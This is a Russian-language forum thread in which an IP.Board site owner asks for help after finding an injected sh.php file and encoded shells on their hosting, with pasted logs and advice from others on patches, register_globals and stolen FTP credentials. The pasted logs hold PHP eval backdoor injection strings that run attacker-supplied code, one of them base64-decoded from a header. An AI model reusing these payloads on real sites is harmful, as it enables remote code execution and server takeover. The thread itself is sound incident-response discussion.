Перейти к контенту
  • 0

Пытаются взломать


hybrid

Вопрос

Ребят, подскажите что делать? Где искать дырку? Может в логах каких-то есть информация? Сегодня на хостинге обнаружил новый файл sh.php:


==============================================================================
========================= END ===================================
========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E ===================================
==============================================================================
==============================================================================
========================= END ===================================
========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E ===================================
==============================================================================

Файл лежал в папке cache. Ещё вчера его не было.

 

Вот ещё информация из eror_log:

 

[02-Nov-2010 22:04:11] PHP Fatal error:  Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376
[02-Nov-2010 22:04:24] PHP Fatal error:  Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376
[02-Nov-2012 05:27:03] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/admin/sources/base/core.php on line 5583

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

Пытаются, но пока видно что безуспешно. Что-то связана с записью логов. Надеюсь на хостинге отключены глобальные переменные?

 

Непонятно только кто это был, с одной стороны школота врядли бы до этого додумалась, с другой стороны странно что их остановил такой пустяк. Обязательно проверьте вышеуказанный параметр.

 

Зы.

То ли ибр взломали, то ли они сами подключили какой-то левый скрипт в начале кода, но меня постоянно редиректится страница.

  • Лайк 1
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Пытаются, но пока видно что безуспешно. Что-то связана с записью логов. Надеюсь на хостинге отключены глобальные переменные?

 

Непонятно только кто это был, с одной стороны школота врядли бы до этого додумалась, с другой стороны странно что их остановил такой пустяк. Обязательно проверьте вышеуказанный параметр.

 

siv1987, если не трудно подскажите как проверить работу глобальных массивов? Я так понимаю, что если в php.ini прописано:

 

; register_globals to be on;  Using form variables as globals can easily lead

 

То они выключены? Если я отключу эти массивы не будет ли проблем с движком? У меня стоит ipb и dle. И главное где отключать лучше? Через .htaccess? Таких файлов целая куча в папках, я так понимаю нужно добавить строку в корневой?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Посмотрите, нет ли там еще какой нибудь записи с register_globals где она включена.

Создайте в корне файл php с содержимом <?php phpinfo(); ?> и посмотрите какой значение у register_globals

  • Лайк 1
Ссылка на комментарий
Поделиться на других сайтах

  • 0
siv1987, выключено, хоть это радует. Не подскажите что ещё можно посмотреть. Может логи сервера или ещё что? Чтобы понять что они ломают и как?
Ссылка на комментарий
Поделиться на других сайтах

  • 0
Что они ломают я вам сказал выше, нет смысла описывать инструкцию для школьников. Смотрите логи сервера, можно еще найдете какие запросы и к каким файлам они делали. Так же, если там находится ДЛЕ я бы посоветовал его поверить. Изменено пользователем siv1987
  • Лайк 1
Ссылка на комментарий
Поделиться на других сайтах

  • 0

siv1987, дело в том, что все доступные заплатки для моей версии уже давно стоят. Ещё до взлома были. Сейчас переименовал админку, пусть помучается. Надо было давно переименовать её :)

 

Кстати, написал хостеру, хочу логи попросить. Интересно что в них будет.

 

Стоп, не все обновления стоят. Сейчас заметил, что в админке есть новое обновление, но оно не походит для русской версии ipb. Странно, почему здесь до сих пор нет обновлений? Может кроме этого обновления я пропустил ещё какие-то?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Школьники. Этому бекдору лет 10. Причем довести его до рабочего состояния - 1 замена имени переменной.

А дальше через эту мерзость инклюдится любой php файл; чаще всего инклюдят мейлер и делают спам-рассылку со взломанного хостинга.

И нужны тут не заплаты безопасности форума, а сканировать свой компьютер на троянов и менять пароль доступа к хостингу, явно же по ФТП каку положили.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Design_Nick, ничего лично, но я пытаюсь вообще не ставить лишних модификаций из непроверенных источников. Видимо единственный вариант это обновить форум до последней версии.

 

 

FatCat, с чего вы взяли, что именно по фтп ломанули? Сейчас стоит filezilla и всё пароли в ней сохранены. Можно ли в обход программы получить доступ к паролям? Ещё слышал, что ftp дырявый протокол и нужно sftp пользоваться. Вот никак руки не доходили, может из-за этого протокола взломали? Вообще как защитить себя от подобного? Ведь рано или поздно, даже если вручную введу данные, их могут перехватить? При условии, что на компьютере троян? Какой у вас антивирус стоит? Что посоветуете?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Ничего не поменялось,опять ломают, но теперь шелы уже добавляют. Ссылка на архив тут, может кто-то посмотрит файлы? Пароль на архив 123. Особенно интересует df.php. Он находится в зашифрованном виде. Что через него можно было сделать?

 

Да, и ломают точно не через фтп. Как-то по другому заливают. Я сегодня днем на хост добавил файл .ftpaccess c ограничением по ip. Так что этот вариант точно отпадает. Хотя есть ещё вариант, что я не правильно разместил этот файл. Нужно в корень хоста или в корень сайта? У меня сейчас он в корне хостинга находится.

 

Брать фикс у IPB http://community.inv...ecurity-update/

для 3.1.4 прикладываю правленый файлик http://narod.ru/disk...9/core.php.html

 

Я оттуда и брал, но это для английской версии и он не работает. А не из проверенных источников ставить не хочется.

 

Забыл ещё логи выложить, которые создает форум:

 

[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/lp/sources/base/core.php on line 5583

 

Продолжение:

 

==============================================================================
=========================	    END	   ===================================
========================= /forum/index.php?%3C?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A030F21C11]));exit;?%3E ===================================
==============================================================================

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Ничего не поменялось,опять ломают, но теперь шелы уже добавляют. Ссылка на архив тут, может кто-то посмотрит файлы? Пароль на архив 123. Особенно интересует df.php. Он находится в зашифрованном виде. Что через него можно было сделать?

 

Да, и ломают точно не через фтп. Как-то по другому заливают. Я сегодня днем на хост добавил файл .ftpaccess c ограничением по ip. Так что этот вариант точно отпадает. Хотя есть ещё вариант, что я не правильно разместил этот файл. Нужно в корень хоста или в корень сайта? У меня сейчас он в корне хостинга находится.

 

Брать фикс у IPB http://community.inv...ecurity-update/

для 3.1.4 прикладываю правленый файлик http://narod.ru/disk...9/core.php.html

 

Я оттуда и брал, но это для английской версии и он не работает. А не из проверенных источников ставить не хочется.

 

Забыл ещё логи выложить, которые создает форум:

 

[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/lp/sources/base/core.php on line 5583

 

Продолжение:

 

==============================================================================
=========================		END	   ===================================
========================= /forum/index.php?%3C?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A030F21C11]));exit;?%3E ===================================
==============================================================================

Это нормальное поведение, а по поводу источников возмите и сравните 2 файла по содержимоу, тот который привел и английскую версию. Будут добавки только VK.Com и куски русских ошибок.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Сейчас стоит filezilla и всё пароли в ней сохранены

это, например, как положить паспорт на подоконник в подъезде

пароли вообще сохранять нельзя

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Arhar, когда собираетесь удалить этот стремный скрипт?

 

Он находится в зашифрованном виде. Что через него можно было сделать?

 

Модно было сделать все.

 

А не из проверенных источников ставить не хочется.

http://ipbskins.ru/forum/topic10765.html

А форум у вас из каких "источников"?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

А форум у вас из каких "источников"?

Лицензия стоит ibresource. Но дело в том, что пол года закончились уже и невозможно скачать обновления. Если бы это был какой-то ломаный форум, я бы просто скачал новую версию.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

в режиме параноика - набивать только виртуальной клавиатурой, как сделано в интернет-банке Росбанка

я никуя не уберу поскольку ниразу не сотрудник ИБРесурс, это обсуждалось уже 100 раз 500 лет подряд

Ссылка на комментарий
Поделиться на других сайтах

  • 0

таже фигня, теже файлы в кеше

 

siv1987, дело в том, что все доступные заплатки для моей версии уже давно стоят. Ещё до взлома были. Сейчас переименовал админку, пусть помучается. Надо было давно переименовать её :)

 

 

админка обеаруживается и в 3.3.4

Изменено пользователем foxx77
Ссылка на комментарий
Поделиться на других сайтах

  • 0

Design_Nick, ничего лично, но я пытаюсь вообще не ставить лишних модификаций из непроверенных источников. Видимо единственный вариант это обновить форум до последней версии.

Я не понял причем здесь "посторонние источники" :) Там официальные заплатки.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.